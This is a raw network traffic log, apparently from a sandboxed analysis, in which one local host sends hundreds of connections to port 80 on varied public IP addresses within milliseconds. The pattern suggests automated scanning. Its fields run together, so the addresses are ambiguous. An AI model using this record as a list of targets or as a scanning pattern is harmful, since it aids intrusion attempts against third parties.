                                                        Mar 21, 2024 05:21:47.384121895 CET4996880192.168.2.13206.1.73.46
                                                        Mar 21, 2024 05:21:47.384136915 CET4996880192.168.2.13181.36.223.106
                                                        Mar 21, 2024 05:21:47.384140968 CET4996880192.168.2.1383.115.138.75
                                                        Mar 21, 2024 05:21:47.384147882 CET4996880192.168.2.13178.86.137.39
                                                        Mar 21, 2024 05:21:47.384160042 CET4996880192.168.2.1382.50.140.59
                                                        Mar 21, 2024 05:21:47.384167910 CET4996880192.168.2.1382.62.120.221
                                                        Mar 21, 2024 05:21:47.384169102 CET4996880192.168.2.13178.79.131.82
                                                        Mar 21, 2024 05:21:47.384174109 CET4996880192.168.2.1380.10.117.190
                                                        Mar 21, 2024 05:21:47.384182930 CET4996880192.168.2.1382.44.103.11
                                                        Mar 21, 2024 05:21:47.384186029 CET4996880192.168.2.13200.16.24.157
                                                        Mar 21, 2024 05:21:47.384191036 CET4996880192.168.2.13206.85.223.87
                                                        Mar 21, 2024 05:21:47.384201050 CET4996880192.168.2.13178.5.37.205
                                                        Mar 21, 2024 05:21:47.384203911 CET4996880192.168.2.13213.170.29.57
                                                        Mar 21, 2024 05:21:47.384203911 CET4996880192.168.2.13178.107.86.112
                                                        Mar 21, 2024 05:21:47.384206057 CET4996880192.168.2.13178.51.133.150
                                                        Mar 21, 2024 05:21:47.384224892 CET4996880192.168.2.1382.29.113.40
                                                        Mar 21, 2024 05:21:47.384226084 CET4996880192.168.2.13213.210.245.199
                                                        Mar 21, 2024 05:21:47.384228945 CET4996880192.168.2.1382.14.4.123
                                                        Mar 21, 2024 05:21:47.384229898 CET4996880192.168.2.13200.77.150.201
                                                        Mar 21, 2024 05:21:47.384237051 CET4996880192.168.2.13169.33.143.227
                                                        Mar 21, 2024 05:21:47.384243965 CET4996880192.168.2.1382.153.237.127
                                                        Mar 21, 2024 05:21:47.384255886 CET4996880192.168.2.1382.97.160.119
                                                        Mar 21, 2024 05:21:47.384265900 CET4996880192.168.2.13206.64.56.237
                                                        Mar 21, 2024 05:21:47.384270906 CET4996880192.168.2.13181.78.26.172
                                                        Mar 21, 2024 05:21:47.384283066 CET4996880192.168.2.13181.50.16.40
                                                        Mar 21, 2024 05:21:47.384288073 CET4996880192.168.2.13200.103.77.167
                                                        Mar 21, 2024 05:21:47.384294987 CET4996880192.168.2.13213.227.75.26
                                                        Mar 21, 2024 05:21:47.384320974 CET4996880192.168.2.13178.63.59.227
                                                        Mar 21, 2024 05:21:47.384332895 CET4996880192.168.2.13169.133.81.241
                                                        Mar 21, 2024 05:21:47.384344101 CET4996880192.168.2.13178.218.21.0
                                                        Mar 21, 2024 05:21:47.384344101 CET4996880192.168.2.1386.219.117.235
                                                        Mar 21, 2024 05:21:47.384345055 CET4996880192.168.2.13169.83.20.32
                                                        Mar 21, 2024 05:21:47.384345055 CET4996880192.168.2.13206.113.70.50
                                                        Mar 21, 2024 05:21:47.384361982 CET4996880192.168.2.1383.9.10.44
                                                        Mar 21, 2024 05:21:47.384372950 CET4996880192.168.2.13213.195.102.127
                                                        Mar 21, 2024 05:21:47.384382010 CET4996880192.168.2.13169.25.131.50
                                                        Mar 21, 2024 05:21:47.384392023 CET4996880192.168.2.1383.216.7.185
                                                        Mar 21, 2024 05:21:47.384392023 CET4996880192.168.2.13206.68.27.90
                                                        Mar 21, 2024 05:21:47.384392023 CET4996880192.168.2.13213.209.25.113
                                                        Mar 21, 2024 05:21:47.384402037 CET4996880192.168.2.13200.223.67.157
                                                        Mar 21, 2024 05:21:47.384413958 CET4996880192.168.2.13206.60.204.47
                                                        Mar 21, 2024 05:21:47.384413958 CET4996880192.168.2.1386.239.203.68
                                                        Mar 21, 2024 05:21:47.384413958 CET4996880192.168.2.13213.138.105.162
                                                        Mar 21, 2024 05:21:47.384417057 CET4996880192.168.2.1386.73.254.189
                                                        Mar 21, 2024 05:21:47.384428024 CET4996880192.168.2.13181.166.12.200
                                                        Mar 21, 2024 05:21:47.384444952 CET4996880192.168.2.13181.76.98.123
                                                        Mar 21, 2024 05:21:47.384449005 CET4996880192.168.2.1383.223.229.150
                                                        Mar 21, 2024 05:21:47.384460926 CET4996880192.168.2.13213.106.40.232
                                                        Mar 21, 2024 05:21:47.384460926 CET4996880192.168.2.1382.217.54.203
                                                        Mar 21, 2024 05:21:47.384475946 CET4996880192.168.2.1386.24.235.121
                                                        Mar 21, 2024 05:21:47.384486914 CET4996880192.168.2.1380.25.221.205
                                                        Mar 21, 2024 05:21:47.384495974 CET4996880192.168.2.1382.155.11.21
                                                        Mar 21, 2024 05:21:47.384499073 CET4996880192.168.2.13206.21.201.17
                                                        Mar 21, 2024 05:21:47.384500027 CET4996880192.168.2.13178.88.144.245
                                                        Mar 21, 2024 05:21:47.384506941 CET4996880192.168.2.13200.250.2.181
                                                        Mar 21, 2024 05:21:47.384531021 CET4996880192.168.2.1386.229.62.246
                                                        Mar 21, 2024 05:21:47.384532928 CET4996880192.168.2.1382.18.187.54
                                                        Mar 21, 2024 05:21:47.384541035 CET4996880192.168.2.13169.141.213.185
                                                        Mar 21, 2024 05:21:47.384552002 CET4996880192.168.2.13169.192.227.25
                                                        Mar 21, 2024 05:21:47.384553909 CET4996880192.168.2.1380.183.113.246
                                                        Mar 21, 2024 05:21:47.384562016 CET4996880192.168.2.1383.48.179.213
                                                        Mar 21, 2024 05:21:47.384566069 CET4996880192.168.2.1380.36.247.102
                                                        Mar 21, 2024 05:21:47.384568930 CET4996880192.168.2.1380.40.145.160
                                                        Mar 21, 2024 05:21:47.384582996 CET4996880192.168.2.13169.29.201.102
                                                        Mar 21, 2024 05:21:47.384583950 CET4996880192.168.2.1382.97.45.145
                                                        Mar 21, 2024 05:21:47.384583950 CET4996880192.168.2.1383.8.87.86
                                                        Mar 21, 2024 05:21:47.384598970 CET4996880192.168.2.13169.235.237.18
                                                        Mar 21, 2024 05:21:47.384602070 CET4996880192.168.2.13213.120.110.99
                                                        Mar 21, 2024 05:21:47.384610891 CET4996880192.168.2.1386.169.201.78
                                                        Mar 21, 2024 05:21:47.384610891 CET4996880192.168.2.13200.181.125.90
                                                        Mar 21, 2024 05:21:47.384612083 CET4996880192.168.2.1383.242.99.169
                                                        Mar 21, 2024 05:21:47.384618044 CET4996880192.168.2.13200.185.57.110
                                                        Mar 21, 2024 05:21:47.384622097 CET4996880192.168.2.1382.125.71.46
                                                        Mar 21, 2024 05:21:47.384633064 CET4996880192.168.2.13200.157.120.48
                                                        Mar 21, 2024 05:21:47.384648085 CET4996880192.168.2.1382.37.131.25
                                                        Mar 21, 2024 05:21:47.384653091 CET4996880192.168.2.1386.112.145.170
                                                        Mar 21, 2024 05:21:47.384677887 CET4996880192.168.2.13213.175.22.223
                                                        Mar 21, 2024 05:21:47.384682894 CET4996880192.168.2.13181.104.39.43
                                                        Mar 21, 2024 05:21:47.384696007 CET4996880192.168.2.1386.26.25.203
                                                        Mar 21, 2024 05:21:47.384706020 CET4996880192.168.2.13200.139.136.227
                                                        Mar 21, 2024 05:21:47.384712934 CET4996880192.168.2.1386.255.142.148
                                                        Mar 21, 2024 05:21:47.384713888 CET4996880192.168.2.13213.191.152.18
                                                        Mar 21, 2024 05:21:47.384713888 CET4996880192.168.2.13169.120.92.130
                                                        Mar 21, 2024 05:21:47.384727955 CET4996880192.168.2.13206.144.217.236
                                                        Mar 21, 2024 05:21:47.384736061 CET4996880192.168.2.13206.250.124.100
                                                        Mar 21, 2024 05:21:47.384744883 CET4996880192.168.2.13169.156.65.90
                                                        Mar 21, 2024 05:21:47.384744883 CET4996880192.168.2.1382.120.19.60
                                                        Mar 21, 2024 05:21:47.384753942 CET4996880192.168.2.1380.77.114.193
                                                        Mar 21, 2024 05:21:47.384762049 CET4996880192.168.2.1380.53.15.254
                                                        Mar 21, 2024 05:21:47.384778023 CET4996880192.168.2.13169.228.209.241
                                                        Mar 21, 2024 05:21:47.384778976 CET4996880192.168.2.13178.211.236.35
                                                        Mar 21, 2024 05:21:47.384782076 CET4996880192.168.2.1380.171.68.105
                                                        Mar 21, 2024 05:21:47.384788036 CET4996880192.168.2.13178.109.133.123
                                                        Mar 21, 2024 05:21:47.384808064 CET4996880192.168.2.13213.112.67.225
                                                        Mar 21, 2024 05:21:47.384809017 CET4996880192.168.2.13178.123.169.57
                                                        Mar 21, 2024 05:21:47.384810925 CET4996880192.168.2.13169.152.208.48
                                                        Mar 21, 2024 05:21:47.384814978 CET4996880192.168.2.1380.166.218.212
                                                        Mar 21, 2024 05:21:47.384835005 CET4996880192.168.2.13206.89.36.112
                                                        Mar 21, 2024 05:21:47.384835005 CET4996880192.168.2.13200.211.51.228
                                                        Mar 21, 2024 05:21:47.384838104 CET4996880192.168.2.13206.142.187.215
                                                        Mar 21, 2024 05:21:47.384838104 CET4996880192.168.2.13206.32.210.38
                                                        Mar 21, 2024 05:21:47.384840012 CET4996880192.168.2.13178.67.90.84
                                                        Mar 21, 2024 05:21:47.384855986 CET4996880192.168.2.13178.33.93.232
                                                        Mar 21, 2024 05:21:47.384855986 CET4996880192.168.2.1382.112.85.18
                                                        Mar 21, 2024 05:21:47.384871006 CET4996880192.168.2.13169.18.38.145
                                                        Mar 21, 2024 05:21:47.384871006 CET4996880192.168.2.1383.6.203.41
                                                        Mar 21, 2024 05:21:47.384871006 CET4996880192.168.2.13200.185.68.93
                                                        Mar 21, 2024 05:21:47.384874105 CET4996880192.168.2.13200.89.198.73
                                                        Mar 21, 2024 05:21:47.384897947 CET4996880192.168.2.13169.186.157.25
                                                        Mar 21, 2024 05:21:47.384897947 CET4996880192.168.2.13169.160.70.198
                                                        Mar 21, 2024 05:21:47.384906054 CET4996880192.168.2.13213.96.58.5
                                                        Mar 21, 2024 05:21:47.384910107 CET4996880192.168.2.13213.247.7.35
                                                        Mar 21, 2024 05:21:47.384913921 CET4996880192.168.2.13200.86.66.30
                                                        Mar 21, 2024 05:21:47.384913921 CET4996880192.168.2.1386.52.76.22
                                                        Mar 21, 2024 05:21:47.384919882 CET4996880192.168.2.13200.118.61.100
                                                        Mar 21, 2024 05:21:47.384934902 CET4996880192.168.2.1383.25.251.32
                                                        Mar 21, 2024 05:21:47.384934902 CET4996880192.168.2.13200.237.134.213
                                                        Mar 21, 2024 05:21:47.384941101 CET4996880192.168.2.13181.126.118.221
                                                        Mar 21, 2024 05:21:47.384941101 CET4996880192.168.2.13206.144.111.149
                                                        Mar 21, 2024 05:21:47.384955883 CET4996880192.168.2.1382.103.135.207
                                                        Mar 21, 2024 05:21:47.384960890 CET4996880192.168.2.1386.35.93.228
                                                        Mar 21, 2024 05:21:47.384978056 CET4996880192.168.2.1382.144.187.41
                                                        Mar 21, 2024 05:21:47.384978056 CET4996880192.168.2.1386.221.9.176
                                                        Mar 21, 2024 05:21:47.384982109 CET4996880192.168.2.13181.252.33.111
                                                        Mar 21, 2024 05:21:47.384982109 CET4996880192.168.2.13206.190.119.73
                                                        Mar 21, 2024 05:21:47.384985924 CET4996880192.168.2.13206.153.195.198
                                                        Mar 21, 2024 05:21:47.385016918 CET4996880192.168.2.13200.84.147.229
                                                        Mar 21, 2024 05:21:47.385019064 CET4996880192.168.2.13169.71.7.230
                                                        Mar 21, 2024 05:21:47.385029078 CET4996880192.168.2.1386.25.137.13
                                                        Mar 21, 2024 05:21:47.385030985 CET4996880192.168.2.13181.105.144.236
                                                        Mar 21, 2024 05:21:47.385030985 CET4996880192.168.2.13200.134.59.41
                                                        Mar 21, 2024 05:21:47.385047913 CET4996880192.168.2.1380.188.209.252
                                                        Mar 21, 2024 05:21:47.385050058 CET4996880192.168.2.13178.72.83.9
                                                        Mar 21, 2024 05:21:47.385054111 CET4996880192.168.2.1386.111.174.204
                                                        Mar 21, 2024 05:21:47.385068893 CET4996880192.168.2.1380.41.193.253
                                                        Mar 21, 2024 05:21:47.385076046 CET4996880192.168.2.1383.57.36.131
                                                        Mar 21, 2024 05:21:47.385088921 CET4996880192.168.2.13206.98.229.79
                                                        Mar 21, 2024 05:21:47.385088921 CET4996880192.168.2.13206.43.193.192
                                                        Mar 21, 2024 05:21:47.385097027 CET4996880192.168.2.1380.33.234.179
                                                        Mar 21, 2024 05:21:47.385097027 CET4996880192.168.2.13169.55.250.31
                                                        Mar 21, 2024 05:21:47.385099888 CET4996880192.168.2.13181.84.54.225
                                                        Mar 21, 2024 05:21:47.385102034 CET4996880192.168.2.13206.63.57.169
                                                        Mar 21, 2024 05:21:47.385102034 CET4996880192.168.2.13213.214.230.210
                                                        Mar 21, 2024 05:21:47.385103941 CET4996880192.168.2.1380.241.156.156
                                                        Mar 21, 2024 05:21:47.385103941 CET4996880192.168.2.1383.14.118.190
                                                        Mar 21, 2024 05:21:47.385106087 CET4996880192.168.2.1382.36.249.248
                                                        Mar 21, 2024 05:21:47.385117054 CET4996880192.168.2.13213.244.181.159
                                                        Mar 21, 2024 05:21:47.385118961 CET4996880192.168.2.13169.188.137.169
                                                        Mar 21, 2024 05:21:47.385121107 CET4996880192.168.2.13181.94.30.182
                                                        Mar 21, 2024 05:21:47.385128975 CET4996880192.168.2.1382.213.26.237
                                                        Mar 21, 2024 05:21:47.385132074 CET4996880192.168.2.13169.100.248.249
                                                        Mar 21, 2024 05:21:47.385142088 CET4996880192.168.2.13213.222.91.82
                                                        Mar 21, 2024 05:21:47.385144949 CET4996880192.168.2.1386.187.167.79
                                                        Mar 21, 2024 05:21:47.385159969 CET4996880192.168.2.13206.76.201.27
                                                        Mar 21, 2024 05:21:47.385163069 CET4996880192.168.2.1380.142.244.4
                                                        Mar 21, 2024 05:21:47.385164976 CET4996880192.168.2.13169.225.181.89
                                                        Mar 21, 2024 05:21:47.385178089 CET4996880192.168.2.13200.209.210.4
                                                        Mar 21, 2024 05:21:47.385190010 CET4996880192.168.2.13213.21.234.132
                                                        Mar 21, 2024 05:21:47.385200977 CET4996880192.168.2.1386.188.65.44
                                                        Mar 21, 2024 05:21:47.385210991 CET4996880192.168.2.13169.140.122.25
                                                        Mar 21, 2024 05:21:47.385231018 CET4996880192.168.2.1383.159.63.108
                                                        Mar 21, 2024 05:21:47.385232925 CET4996880192.168.2.1386.64.213.184
                                                        Mar 21, 2024 05:21:47.385237932 CET4996880192.168.2.1386.191.40.127
                                                        Mar 21, 2024 05:21:47.385242939 CET4996880192.168.2.1386.246.160.73
                                                        Mar 21, 2024 05:21:47.385257006 CET4996880192.168.2.1386.83.173.254
                                                        Mar 21, 2024 05:21:47.385261059 CET4996880192.168.2.1383.215.89.222
                                                        Mar 21, 2024 05:21:47.385261059 CET4996880192.168.2.13206.130.68.234
                                                        Mar 21, 2024 05:21:47.385266066 CET4996880192.168.2.13169.155.200.113
                                                        Mar 21, 2024 05:21:47.385266066 CET4996880192.168.2.1382.26.45.139
                                                        Mar 21, 2024 05:21:47.385272026 CET4996880192.168.2.1382.92.245.167
                                                        Mar 21, 2024 05:21:47.385282040 CET4996880192.168.2.13178.234.107.156
                                                        Mar 21, 2024 05:21:47.385282993 CET4996880192.168.2.13169.104.7.9
                                                        Mar 21, 2024 05:21:47.385298967 CET4996880192.168.2.13206.105.165.114
                                                        Mar 21, 2024 05:21:47.385303020 CET4996880192.168.2.13169.106.97.223
                                                        Mar 21, 2024 05:21:47.385309935 CET4996880192.168.2.13213.11.224.227
                                                        Mar 21, 2024 05:21:47.385310888 CET4996880192.168.2.13206.87.109.80
                                                        Mar 21, 2024 05:21:47.385313988 CET4996880192.168.2.13200.9.191.179
                                                        Mar 21, 2024 05:21:47.385314941 CET4996880192.168.2.1380.32.1.70
                                                        Mar 21, 2024 05:21:47.385317087 CET4996880192.168.2.1386.191.92.107
                                                        Mar 21, 2024 05:21:47.385329962 CET4996880192.168.2.13213.213.127.34
                                                        Mar 21, 2024 05:21:47.385345936 CET4996880192.168.2.13206.51.67.164
                                                        Mar 21, 2024 05:21:47.385348082 CET4996880192.168.2.13213.155.140.196
                                                        Mar 21, 2024 05:21:47.385350943 CET4996880192.168.2.13206.87.193.222
                                                        Mar 21, 2024 05:21:47.385350943 CET4996880192.168.2.1383.20.221.135
                                                        Mar 21, 2024 05:21:47.385358095 CET4996880192.168.2.13178.82.211.26
                                                        Mar 21, 2024 05:21:47.385381937 CET4996880192.168.2.13200.144.9.80
                                                        Mar 21, 2024 05:21:47.385401964 CET4996880192.168.2.1383.161.229.106
                                                        Mar 21, 2024 05:21:47.385405064 CET4996880192.168.2.1386.105.163.122
                                                        Mar 21, 2024 05:21:47.385410070 CET4996880192.168.2.13169.80.101.204
                                                        Mar 21, 2024 05:21:47.385410070 CET4996880192.168.2.13206.94.20.172
                                                        Mar 21, 2024 05:21:47.385413885 CET4996880192.168.2.13169.178.184.195
                                                        Mar 21, 2024 05:21:47.385438919 CET4996880192.168.2.13213.39.57.202
                                                        Mar 21, 2024 05:21:47.385438919 CET4996880192.168.2.13178.96.132.196
                                                        Mar 21, 2024 05:21:47.385440111 CET4996880192.168.2.1383.226.237.135
                                                        Mar 21, 2024 05:21:47.385452032 CET4996880192.168.2.1380.25.160.107
                                                        Mar 21, 2024 05:21:47.385452032 CET4996880192.168.2.13181.244.118.90
                                                        Mar 21, 2024 05:21:47.385454893 CET4996880192.168.2.13213.58.130.135
                                                        Mar 21, 2024 05:21:47.385463953 CET4996880192.168.2.13178.1.218.200
                                                        Mar 21, 2024 05:21:47.385476112 CET4996880192.168.2.1380.127.205.153
                                                        Mar 21, 2024 05:21:47.385484934 CET4996880192.168.2.13213.4.12.212
                                                        Mar 21, 2024 05:21:47.385493994 CET4996880192.168.2.13213.85.181.159
                                                        Mar 21, 2024 05:21:47.385493994 CET4996880192.168.2.1386.249.137.93
                                                        Mar 21, 2024 05:21:47.385497093 CET4996880192.168.2.13206.171.12.157
                                                        Mar 21, 2024 05:21:47.385502100 CET4996880192.168.2.1380.172.25.16
                                                        Mar 21, 2024 05:21:47.385503054 CET4996880192.168.2.1386.246.127.33
                                                        Mar 21, 2024 05:21:47.385509014 CET4996880192.168.2.1382.124.80.0
                                                        Mar 21, 2024 05:21:47.385513067 CET4996880192.168.2.13200.236.197.121
                                                        Mar 21, 2024 05:21:47.385519028 CET4996880192.168.2.1386.35.38.114
                                                        Mar 21, 2024 05:21:47.385524035 CET4996880192.168.2.1382.158.208.50
                                                        Mar 21, 2024 05:21:47.385524035 CET4996880192.168.2.13200.127.77.199
                                                        Mar 21, 2024 05:21:47.385524035 CET4996880192.168.2.13213.172.151.168
                                                        Mar 21, 2024 05:21:47.385524035 CET4996880192.168.2.13206.80.45.116
                                                        Mar 21, 2024 05:21:47.385524988 CET4996880192.168.2.1386.188.103.93
                                                        Mar 21, 2024 05:21:47.385524035 CET4996880192.168.2.1382.34.125.200
                                                        Mar 21, 2024 05:21:47.385551929 CET4996880192.168.2.1382.14.247.193
                                                        Mar 21, 2024 05:21:47.385557890 CET4996880192.168.2.13200.100.59.7
                                                        Mar 21, 2024 05:21:47.385557890 CET4996880192.168.2.1382.51.121.73
                                                        Mar 21, 2024 05:21:47.385557890 CET4996880192.168.2.13178.182.160.200
                                                        Mar 21, 2024 05:21:47.385559082 CET4996880192.168.2.1382.97.165.102
                                                        Mar 21, 2024 05:21:47.385565996 CET4996880192.168.2.1382.47.56.71
                                                        Mar 21, 2024 05:21:47.385577917 CET4996880192.168.2.13178.24.119.135
                                                        Mar 21, 2024 05:21:47.385580063 CET4996880192.168.2.13178.187.245.226
                                                        Mar 21, 2024 05:21:47.385590076 CET4996880192.168.2.13178.133.119.234
                                                        Mar 21, 2024 05:21:47.385591030 CET4996880192.168.2.1382.71.153.114
                                                        Mar 21, 2024 05:21:47.385603905 CET4996880192.168.2.13169.78.171.245
                                                        Mar 21, 2024 05:21:47.385612965 CET4996880192.168.2.13213.196.50.112
                                                        Mar 21, 2024 05:21:47.385621071 CET4996880192.168.2.13181.19.87.238
                                                        Mar 21, 2024 05:21:47.385626078 CET4996880192.168.2.13200.177.122.248
                                                        Mar 21, 2024 05:21:47.385632992 CET4996880192.168.2.13206.231.242.144
                                                        Mar 21, 2024 05:21:47.385636091 CET4996880192.168.2.1382.226.110.249
                                                        Mar 21, 2024 05:21:47.385646105 CET4996880192.168.2.13169.141.60.23
                                                        Mar 21, 2024 05:21:47.385658026 CET4996880192.168.2.13200.19.148.207
                                                        Mar 21, 2024 05:21:47.385658026 CET4996880192.168.2.1382.241.80.225
                                                        Mar 21, 2024 05:21:47.385670900 CET4996880192.168.2.13181.215.212.151
                                                        Mar 21, 2024 05:21:47.385670900 CET4996880192.168.2.13169.143.52.25
                                                        Mar 21, 2024 05:21:47.385673046 CET4996880192.168.2.13206.249.96.91
                                                        Mar 21, 2024 05:21:47.385678053 CET4996880192.168.2.13178.14.111.164
                                                        Mar 21, 2024 05:21:47.385694981 CET4996880192.168.2.13178.99.37.187
                                                        Mar 21, 2024 05:21:47.385699034 CET4996880192.168.2.13178.240.88.79
                                                        Mar 21, 2024 05:21:47.385709047 CET4996880192.168.2.1386.70.43.166
                                                        Mar 21, 2024 05:21:47.385710001 CET4996880192.168.2.13178.244.232.85
                                                        Mar 21, 2024 05:21:47.385715008 CET4996880192.168.2.13181.246.225.119
                                                        Mar 21, 2024 05:21:47.385729074 CET4996880192.168.2.1383.240.143.35
                                                        Mar 21, 2024 05:21:47.385731936 CET4996880192.168.2.13200.12.1.219
                                                        Mar 21, 2024 05:21:47.385734081 CET4996880192.168.2.1386.23.182.211
                                                        Mar 21, 2024 05:21:47.385739088 CET4996880192.168.2.13200.13.220.139
                                                        Mar 21, 2024 05:21:47.385756016 CET4996880192.168.2.1383.83.45.178
                                                        Mar 21, 2024 05:21:47.385760069 CET4996880192.168.2.1382.226.53.154
                                                        Mar 21, 2024 05:21:47.385766983 CET4996880192.168.2.13181.179.154.148
                                                        Mar 21, 2024 05:21:47.385782957 CET4996880192.168.2.13206.143.23.84
                                                        Mar 21, 2024 05:21:47.385804892 CET4996880192.168.2.13169.188.239.112
                                                        Mar 21, 2024 05:21:47.385806084 CET4996880192.168.2.13213.182.31.3
                                                        Mar 21, 2024 05:21:47.385821104 CET4996880192.168.2.13169.50.192.122
                                                        Mar 21, 2024 05:21:47.385822058 CET4996880192.168.2.13213.140.115.101
                                                        Mar 21, 2024 05:21:47.385823011 CET4996880192.168.2.13200.92.163.99
                                                        Mar 21, 2024 05:21:47.385843039 CET4996880192.168.2.13169.205.244.246
                                                        Mar 21, 2024 05:21:47.385843039 CET4996880192.168.2.1382.115.124.94
                                                        Mar 21, 2024 05:21:47.385843992 CET4996880192.168.2.1380.120.147.249
                                                        Mar 21, 2024 05:21:47.385843992 CET4996880192.168.2.13200.186.236.57
                                                        Mar 21, 2024 05:21:47.385857105 CET4996880192.168.2.1382.161.29.14
                                                        Mar 21, 2024 05:21:47.385857105 CET4996880192.168.2.13181.74.155.202
                                                        Mar 21, 2024 05:21:47.385883093 CET4996880192.168.2.13213.87.127.129
                                                        Mar 21, 2024 05:21:47.385888100 CET4996880192.168.2.1386.81.255.247
                                                        Mar 21, 2024 05:21:47.385893106 CET4996880192.168.2.13206.50.155.129
                                                        Mar 21, 2024 05:21:47.385902882 CET4996880192.168.2.1386.54.183.127
                                                        Mar 21, 2024 05:21:47.385905027 CET4996880192.168.2.13206.24.253.139
                                                        Mar 21, 2024 05:21:47.385905981 CET4996880192.168.2.13178.101.175.230
                                                        Mar 21, 2024 05:21:47.385912895 CET4996880192.168.2.1382.127.63.177
                                                        Mar 21, 2024 05:21:47.385924101 CET4996880192.168.2.13178.231.30.231
                                                        Mar 21, 2024 05:21:47.385926962 CET4996880192.168.2.13181.28.223.93
                                                        Mar 21, 2024 05:21:47.385934114 CET4996880192.168.2.13169.208.40.98
                                                        Mar 21, 2024 05:21:47.385942936 CET4996880192.168.2.1380.254.206.172
                                                        Mar 21, 2024 05:21:47.385951042 CET4996880192.168.2.1382.237.108.33
                                                        Mar 21, 2024 05:21:47.385957003 CET4996880192.168.2.13206.95.1.69
                                                        Mar 21, 2024 05:21:47.385965109 CET4996880192.168.2.1380.236.236.170
                                                        Mar 21, 2024 05:21:47.385977983 CET4996880192.168.2.1383.73.165.90
                                                        Mar 21, 2024 05:21:47.385998964 CET4996880192.168.2.13181.114.15.132
                                                        Mar 21, 2024 05:21:47.386004925 CET4996880192.168.2.13213.2.102.190
                                                        Mar 21, 2024 05:21:47.386020899 CET4996880192.168.2.13206.132.3.148
                                                        Mar 21, 2024 05:21:47.386020899 CET4996880192.168.2.13213.56.135.172
                                                        Mar 21, 2024 05:21:47.386022091 CET4996880192.168.2.1383.114.35.39
                                                        Mar 21, 2024 05:21:47.386022091 CET4996880192.168.2.13206.223.234.112
                                                        Mar 21, 2024 05:21:47.386025906 CET4996880192.168.2.1386.125.174.146
                                                        Mar 21, 2024 05:21:47.386025906 CET4996880192.168.2.13181.22.106.104
                                                        Mar 21, 2024 05:21:47.386039019 CET4996880192.168.2.13213.52.152.4
                                                        Mar 21, 2024 05:21:47.386040926 CET4996880192.168.2.13206.134.101.131
                                                        Mar 21, 2024 05:21:47.386043072 CET4996880192.168.2.13206.149.188.61
                                                        Mar 21, 2024 05:21:47.386043072 CET4996880192.168.2.1383.120.157.20
                                                        Mar 21, 2024 05:21:47.386054993 CET4996880192.168.2.1383.46.107.32
                                                        Mar 21, 2024 05:21:47.386060953 CET4996880192.168.2.13181.167.111.238
                                                        Mar 21, 2024 05:21:47.386060953 CET4996880192.168.2.13178.201.156.28
                                                        Mar 21, 2024 05:21:47.386074066 CET4996880192.168.2.13169.55.63.140
                                                        Mar 21, 2024 05:21:47.386081934 CET4996880192.168.2.1382.208.161.33
                                                        Mar 21, 2024 05:21:47.386085033 CET4996880192.168.2.1380.254.55.89
                                                        Mar 21, 2024 05:21:47.386101961 CET4996880192.168.2.13206.9.81.50
                                                        Mar 21, 2024 05:21:47.386102915 CET4996880192.168.2.13206.163.240.238
                                                        Mar 21, 2024 05:21:47.386112928 CET4996880192.168.2.13181.170.158.227
                                                        Mar 21, 2024 05:21:47.386131048 CET4996880192.168.2.1386.65.213.253
                                                        Mar 21, 2024 05:21:47.386131048 CET4996880192.168.2.1383.82.107.79
                                                        Mar 21, 2024 05:21:47.386133909 CET4996880192.168.2.13178.93.168.178
                                                        Mar 21, 2024 05:21:47.386137962 CET4996880192.168.2.1382.247.116.5
                                                        Mar 21, 2024 05:21:47.386136055 CET4996880192.168.2.13213.137.167.111
                                                        Mar 21, 2024 05:21:47.386136055 CET4996880192.168.2.13169.61.23.37
                                                        Mar 21, 2024 05:21:47.386137962 CET4996880192.168.2.13206.190.105.96
                                                        Mar 21, 2024 05:21:47.386157036 CET4996880192.168.2.13169.159.99.202
                                                        Mar 21, 2024 05:21:47.386157990 CET4996880192.168.2.1380.193.122.91
                                                        Mar 21, 2024 05:21:47.386161089 CET4996880192.168.2.1386.231.237.113
                                                        Mar 21, 2024 05:21:47.386164904 CET4996880192.168.2.13206.237.63.16
                                                        Mar 21, 2024 05:21:47.386178970 CET4996880192.168.2.13200.91.70.48
                                                        Mar 21, 2024 05:21:47.386189938 CET4996880192.168.2.1386.209.232.232
                                                        Mar 21, 2024 05:21:47.386198044 CET4996880192.168.2.1386.205.139.89
                                                        Mar 21, 2024 05:21:47.386198997 CET4996880192.168.2.13169.113.127.137
                                                        Mar 21, 2024 05:21:47.386213064 CET4996880192.168.2.13178.244.208.117
                                                        Mar 21, 2024 05:21:47.386215925 CET4996880192.168.2.13181.166.83.78
                                                        Mar 21, 2024 05:21:47.386217117 CET4996880192.168.2.1380.32.201.100
                                                        Mar 21, 2024 05:21:47.386219978 CET4996880192.168.2.1380.237.45.112
                                                        Mar 21, 2024 05:21:47.386234045 CET4996880192.168.2.1380.11.2.50
                                                        Mar 21, 2024 05:21:47.386236906 CET4996880192.168.2.13206.102.233.68
                                                        Mar 21, 2024 05:21:47.386236906 CET4996880192.168.2.13169.139.166.97
                                                        Mar 21, 2024 05:21:47.386250019 CET4996880192.168.2.13200.102.205.3
                                                        Mar 21, 2024 05:21:47.386265039 CET4996880192.168.2.13213.204.208.130
                                                        Mar 21, 2024 05:21:47.386271000 CET4996880192.168.2.1383.199.116.180
                                                        Mar 21, 2024 05:21:47.386271000 CET4996880192.168.2.13181.159.204.119
                                                        Mar 21, 2024 05:21:47.386271954 CET4996880192.168.2.13200.40.184.87
                                                        Mar 21, 2024 05:21:47.386272907 CET4996880192.168.2.13213.188.27.64
                                                        Mar 21, 2024 05:21:47.386276960 CET4996880192.168.2.13181.178.211.78
                                                        Mar 21, 2024 05:21:47.386276960 CET4996880192.168.2.13169.82.252.93
                                                        Mar 21, 2024 05:21:47.386276960 CET4996880192.168.2.13213.138.127.55
                                                        Mar 21, 2024 05:21:47.386276960 CET4996880192.168.2.13181.132.116.111
                                                        Mar 21, 2024 05:21:47.386288881 CET4996880192.168.2.1383.3.210.13
                                                        Mar 21, 2024 05:21:47.386288881 CET4996880192.168.2.1382.188.18.158
                                                        Mar 21, 2024 05:21:47.386288881 CET4996880192.168.2.1382.0.163.138
                                                        Mar 21, 2024 05:21:47.386293888 CET4996880192.168.2.1386.229.135.8
                                                        Mar 21, 2024 05:21:47.386297941 CET4996880192.168.2.13200.45.11.224
                                                        Mar 21, 2024 05:21:47.386302948 CET4996880192.168.2.13169.133.226.240
                                                        Mar 21, 2024 05:21:47.386311054 CET4996880192.168.2.13200.234.54.248
                                                        Mar 21, 2024 05:21:47.386311054 CET4996880192.168.2.13200.19.150.151
                                                        Mar 21, 2024 05:21:47.386317015 CET4996880192.168.2.13200.122.81.239
                                                        Mar 21, 2024 05:21:47.386331081 CET4996880192.168.2.13206.7.58.191
                                                        Mar 21, 2024 05:21:47.386332035 CET4996880192.168.2.13200.15.235.144
